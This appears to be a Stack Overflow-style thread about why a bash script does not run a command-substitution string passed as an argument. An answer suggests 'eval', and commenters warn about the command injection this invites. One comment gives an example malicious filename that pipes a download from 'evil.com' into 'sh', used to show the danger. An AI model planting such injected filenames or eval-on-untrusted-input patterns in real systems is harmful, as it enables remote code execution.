# Variable and argument in a bash script: could you explain the behaviour and find a way to get it work as I expect

Tags: bash, shell, scripting

Just wondering if any bash expert could help we in finding a way to get the same behavior in both cases for the 2 results in the code below.
I'd like to be able to get the same result I have with the variable (result1) but by passing an argument (result2). Maybe it is just not possible whatever the argument...

**The code**

```
#!/bin/sh

var1="$(ls)"
echo -------var1-------
echo $var1

var2=$1
echo -------var2-------
echo $var2

# execute ls with variable
result1=$(file ${var1})

# execute ls with script argument
result2=$(file ${var2})

echo ------ result1 ------
echo $result1
echo ---------------------

echo ------ result2 ------
echo $result2
echo ---------------------
```

**The command and the result**

```
>./test.sh '$(ls)'

-------var1-------
myzipfile.zip test.sh
-------var2-------
$(ls)
------ result1 ------
myzipfile.zip: Zip archive data, at least v2.0 to extract
test.sh: POSIX shell script, ASCII text executable
---------------------
------ result2 ------
$(ls): cannot open `$(ls)' (No such file or directory)
---------------------
```

Comment: Why isn't this what you expect?

Comment: You need to use `eval` to execute the command substitution in the variable.

Comment: If data was automatically parsed as code, it would be impossible to write code that handles untrusted data in bash. (And if you use `eval` as Barmar suggests above, _your_ code will be trusting its data, and insecure if that trust is ever misplaced; it's a Very Bad Idea unless you know exactly what you're doing). See [BashFAQ #48](https://mywiki.wooledge.org/BashFAQ/048).

Comment: (Even if we take `eval` out of the picture, `file $(ls)` isn't reliable either; see [BashPitfalls #1](https://mywiki.wooledge.org/BashPitfalls#for_f_in_.24.28ls_.2A.mp3.29))

Comment: sorry "expect" was not the right word. It would have been helpful if I could find a way to change the parameter instead of changing the code. This code is just an example of what I'm trying to achieve. The idea is to path a command that could feed the one in the code.

Comment: Let me give you a concrete example. If you want people to run `yourscript *.txt` _but also_ `yourscript '$(ls *.txt)'`, then you need to worry about what happens if a file named `$(curl evil.com|sh).txt` exists (and yes, that's a legal filename); in the `*.txt` case you'll have that filename passed through `eval`, running `curl`, and then presumably installing a rootkit.

Comment: So it's much better practice to keep data and code separate, and not support any usage pattern that can silently cause your data to be interpreted as code. Sometimes telling users "no, that feature you want is a bad idea" is the right thing.

Comment: Ok so you mean this kind of thing is not possible due to security issues ... understand!

Comment: "Not advisable" more than "not possible". Barmar showed you how to do it, I'm explaining why you might not want to. :)

Answer (score 0):

You have to use `eval` to process a variable as bash code.

```
eval "var2=\"$1\""
```

You should not use something like this if the script parameter comes from somewhere outside the control of the user executing the script, since they could put dangerous commands in `$1`.

Comment: Second one is working but the first one gives me: ./test.sh: 8: Syntax error: "(" unexpected

Comment: It needs to be `$(` and use `echo`, but that complicates it so much I've deleted it.

Comment: By the way, talking about security and the example of Charles above, what would prevent somebody to launch the script with a parameter containing a semicolon and execute command following the "file" call?

Comment: @justmalstk Unless the parameters are coming from somewhere outside the user's control, it will just do something the user can do themselves.

Comment: Users don't always pay attention to things inside their control. Users aren't always humans -- sometimes they're scripts that operate on filenames blindly without using discretion about whether those filenames follow their usual/expected patterns or thinking about whether they're in `/tmp` or an uploads folder rather than a directory they exclusively own. I've won CTF exercises on account of such things.